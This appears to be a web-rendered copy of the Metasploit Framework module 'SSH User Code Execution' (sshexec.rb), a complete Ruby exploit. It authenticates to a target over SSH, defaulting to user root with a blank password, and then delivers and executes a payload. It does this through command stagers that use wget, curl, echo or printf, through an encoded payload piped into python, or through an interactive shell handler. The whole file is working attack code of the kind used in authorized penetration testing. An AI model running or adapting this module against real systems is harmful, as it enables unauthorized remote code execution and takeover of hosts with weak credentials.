Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/ssh/sshexec.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::SSH

11


12
  attr_accessor :ssh_socket

13


14
  def initialize

15
    super(

16
      'Name' => 'SSH User Code Execution',

17
      'Description' => %q(

18
        This module connects to the target system and executes the necessary

19
        commands to run the specified payload via SSH. If a native payload is

20
        specified, an appropriate stager will be used.

21
      ),

22
      'Author' => ['Spencer McIntyre', 'Brandon Knight'],

23
      'References' => [

24
        [ 'CVE', '1999-0502'] # Weak password

25
      ],

26
      'License' => MSF_LICENSE,

27
      'Privileged' => true,

28
      'DefaultOptions' => {

29
        'PrependFork' => 'true',

30
        'EXITFUNC' => 'process'

31
      },

32
      'Payload' => {

33
        'Space' => 800000,

34
        'BadChars' => "",

35
        'DisableNops' => true

36
      },

37
      'Platform' => %w[linux osx unix python bsd],

38
      'CmdStagerFlavor' => %w[bourne echo printf wget],

39
      'Targets' => [

40
        [

41
          'Linux Command',

42
          {

43
            'Arch' => ARCH_CMD,

44
            'Platform' => 'linux'

45
          }

46
        ],

47
        [

48
          'Linux x86',

49
          {

50
            'Arch' => ARCH_X86,

51
            'Platform' => 'linux'

52
          }

53
        ],

54
        [

55
          'Linux x64',

56
          {

57
            'Arch' => ARCH_X64,

58
            'Platform' => 'linux'

59
          }

60
        ],

61
        [

62
          'Linux armle',

63
          {

64
            'Arch' => ARCH_ARMLE,

65
            'Platform' => 'linux'

66
          }

67
        ],

68
        [

69
          'Linux mipsle',

70
          {

71
            'Arch' => ARCH_MIPSLE,

72
            'Platform' => 'linux',

73
            'CmdStagerFlavor' => %w[curl wget]

74
          }

75
        ],

76
        [

77
          'Linux mipsbe',

78
          {

79
            'Arch' => ARCH_MIPSBE,

80
            'Platform' => 'linux',

81
            'CmdStagerFlavor' => %w[wget]

82
          }

83
        ],

84
        [

85
          'Linux aarch64',

86
          {

87
            'Arch' => ARCH_AARCH64,

88
            'Platform' => 'linux'

89
          }

90
        ],

91
        [

92
          'OSX x86',

93
          {

94
            'Arch' => ARCH_X86,

95
            'Platform' => 'osx',

96
            'CmdStagerFlavor' => %w[curl wget]

97
          }

98
        ],

99
        [

100
          'OSX x64',

101
          {

102
            'Arch' => ARCH_X64,

103
            'Platform' => 'osx',

104
            'CmdStagerFlavor' => %w[curl wget]

105
          }

106
        ],

107
        [

108
          'BSD x86',

109
          {

110
            'Arch' => ARCH_X86,

111
            'Platform' => 'bsd',

112
            'CmdStagerFlavor' => %w[printf curl wget]

113
          }

114
        ],

115
        [

116
          'BSD x64',

117
          {

118
            'Arch' => ARCH_X64,

119
            'Platform' => 'bsd',

120
            'CmdStagerFlavor' => %w[printf curl wget]

121
          }

122
        ],

123
        [

124
          'Python',

125
          {

126
            'Arch' => ARCH_PYTHON,

127
            'Platform' => 'python'

128
          }

129
        ],

130
        [

131
          'Unix Cmd',

132
          {

133
            'Arch' => ARCH_CMD,

134
            'Platform' => 'unix'

135
          }

136
        ],

137
        [

138
          'Interactive SSH',

139
          {

140
            'DefaultOptions' => {

141
              'PAYLOAD' => 'generic/ssh/interact',

142
              'WfsDelay' => 5

143
            },

144
            'Payload' => {

145
              'Compat' => {

146
                'PayloadType' => 'ssh_interact',

147
              }

148
            }

149
          }

150
        ]

151
      ],

152
      'DefaultTarget' => 0,

153
      # For the CVE

154
      'DisclosureDate' => 'Jan 01 1999',

155
      'Notes' => {

156
        'Stability' => [ CRASH_SAFE, ],

157
        'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],

158
        'Reliability' => [ REPEATABLE_SESSION, ],

159
      },

160
    )

161


162
    register_options(

163
      [

164
        OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),

165
        OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),

166
        Opt::RHOST(),

167
        Opt::RPORT(22)

168
      ]

169
    )

170


171
    register_advanced_options(

172
      [

173
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])

174
      ]

175
    )

176
  end

177


178
  def execute_command(cmd, opts = {})

179
    vprint_status("Executing #{cmd}")

180
    begin

181
      Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }

182
    rescue Timeout::Error

183
      print_warning('Timed out while waiting for command to return')

184
      @timeout = true

185
    end

186
  end

187


188
  def do_login(ip, user, pass, port)

189
    opt_hash = ssh_client_defaults.merge({

190
      auth_methods: ['password', 'keyboard-interactive'],

191
      port: port,

192
      password: pass

193
    })

194


195
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

196


197
    begin

198
      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)

199
    rescue Rex::ConnectionError

200
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')

201
    rescue Net::SSH::Disconnect, ::EOFError

202
      fail_with(Failure::Disconnected, 'Timed out during negotiation')

203
    rescue Net::SSH::AuthenticationFailed

204
      fail_with(Failure::NoAccess, 'Failed authentication')

205
    rescue Net::SSH::Exception => e

206
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")

207
    end

208


209
    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket

210
  end

211


212
  def binary_exists(binary, platform: nil)

213
    Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))

214
  end

215


216
  def execute_python

217
    python_binary = binary_exists('python', platform: 'unix')

218
    python_binary ||= binary_exists('python3', platform: 'unix')

219
    python_binary ||= binary_exists('python2', platform: 'unix')

220
    fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?

221


222
    execute_command("echo \"#{payload.encoded}\" | #{python_binary}")

223
  end

224


225
  def exploit

226
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

227


228
    if target.name == 'Interactive SSH'

229
      handler(ssh_socket)

230
      return

231
    end

232


233
    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")

234


235
    case target['Platform']

236
    when 'python'

237
      execute_python

238
    when 'unix'

239
      execute_command(payload.encoded)

240
    else

241
      if target['Arch'] == ARCH_CMD

242
        execute_command(payload.encoded)

243
      else

244
        execute_cmdstager(linemax: 500)

245
      end

246
    end

247


248
    @timeout ? ssh_socket.shutdown! : ssh_socket.close

249
  end

250
end

251


252